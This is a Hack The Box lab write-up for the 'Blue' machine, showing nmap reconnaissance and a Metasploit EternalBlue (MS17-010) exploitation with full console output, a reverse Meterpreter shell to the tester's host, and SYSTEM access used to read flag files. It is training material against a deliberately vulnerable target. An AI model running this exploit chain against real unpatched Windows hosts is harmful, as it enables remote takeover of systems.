Blue
Blue is one of the most iconic HTB machines, demonstrating the devastating impact of MS17-010 (EternalBlue). The entire attack chain is a single CVE - scan, confirm vulnerability, exploit, land as SYSTEM.
Blue
#EternalBlue
Attack Chain
1
2
3
4
5
6
7
Nmap → Port 445 open (Windows 7 SP1)
→ smb-vuln-ms17-010 confirms EternalBlue
→ MSF ms17_010_eternalblue
→ Kernel pool grooming → RCE
→ NT AUTHORITY\SYSTEM shell
→ user.txt (haris\Desktop)
→ root.txt (Administrator\Desktop)
Reconnaissance
Full port scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
Nmap scan report for 10.129.16.72
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2026-06-11 22:00:59 EAT for 1025s
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2026-06-11T20:17:58+01:00
| smb2-time:
| date: 2026-06-11T19:17:57
|_ start_date: 2026-06-11T18:59:10
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 45704/tcp): CLEAN (Couldn't connect)
| Check 2 (port 45860/tcp): CLEAN (Couldn't connect)
| Check 3 (port 56906/udp): CLEAN (Failed to receive data)
| Check 4 (port 49107/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
|_clock-skew: mean: -19m56s, deviation: 34m35s, median: 1s
Windows 7 SP1 + exposed SMB immediately suggests MS17-010. Confirm with a targeted script:
1
nmap -p445 --script smb-vuln-ms17-010 10.129.16.72
Output confirms: VULNERABLE to MS17-010 (EternalBlue) - Remote Code Execution.
Exploitation - MS17-010 EternalBlue
Load the Metasploit module:
Verify before firing:
1
2
3
4
5
6
7
8
9
10
msf exploit(windows/smb/ms17_010_eternalblue) > setg RHOSTS 10.129.16.72
RHOSTS => 10.129.16.72
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => 10.10.15.192
msf exploit(windows/smb/ms17_010_eternalblue) > check
[*] 10.129.16.72:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.16.72:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.16.72:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.16.72:445 - The target is vulnerable.
Run the exploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.15.192:4444
[*] 10.129.16.72:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.16.72:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.16.72:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.16.72:445 - The target is vulnerable.
[*] 10.129.16.72:445 - Connecting to target for exploitation.
[+] 10.129.16.72:445 - Connection established for exploitation.
[+] 10.129.16.72:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.16.72:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.16.72:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.129.16.72:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.129.16.72:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.129.16.72:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.16.72:445 - Trying exploit with 22 Groom Allocations.
[*] 10.129.16.72:445 - Sending all but last fragment of exploit packet
[*] 10.129.16.72:445 - Starting non-paged pool grooming
[+] 10.129.16.72:445 - Sending SMBv2 buffers
[+] 10.129.16.72:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.129.16.72:445 - Sending final SMBv2 buffers.
[*] 10.129.16.72:445 - Sending last fragment of exploit packet!
[*] 10.129.16.72:445 - Receiving response from exploit packet
[+] 10.129.16.72:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.16.72:445 - Sending egg to corrupted connection.
[*] 10.129.16.72:445 - Triggering free of corrupted buffer.
[*] Sending stage (248902 bytes) to 10.129.16.72
[*] Meterpreter session 1 opened (10.10.15.192:4444 -> 10.129.16.72:49158) at 2026-06-11 22:22:13 +0300
[+] 10.129.16.72:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.16.72:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.16.72:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The exploit performs pool grooming by manipulating Windows kernel memory via crafted SMBv1 packets to corrupt a non-paged pool buffer, then overwrites it to redirect execution:
Drop into a shell:
1
2
3
4
5
6
7
8
9
meterpreter > shell
Process 1624 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Running whoami confirms we are SYSTEM. EternalBlue exploits the kernel, so no privilege escalation is needed.
Grab the user flag from haris desktop:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
c:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of c:\Users
21/07/2017 07:56 <DIR> .
21/07/2017 07:56 <DIR> ..
21/07/2017 07:56 <DIR> Administrator
14/07/2017 14:45 <DIR> haris
12/04/2011 08:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 2,690,838,528 bytes free
c:\Users>cd haris\Desktop
cd haris\Desktop
c:\Users\haris\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of c:\Users\haris\Desktop
24/12/2017 03:23 <DIR> .
24/12/2017 03:23 <DIR> ..
11/06/2026 19:59 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 2,690,838,528 bytes free
c:\Users\haris\Desktop>more user.txt
more user.txt
3a504xxxxxxxxxxxxxxxxxxdf9af
Grab the root flag from Administrator desktop:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
C:\Windows\system32>cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of c:\Users\Administrator\Desktop
24/12/2017 03:22 <DIR> .
24/12/2017 03:22 <DIR> ..
11/06/2026 19:59 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,690,850,816 bytes free
c:\Users\Administrator\Desktop>more root.txt
more root.txt
023cxxxxxxxxxxxxxxxxxx7b6015
This post is licensed under CC BY 4.0 by the author.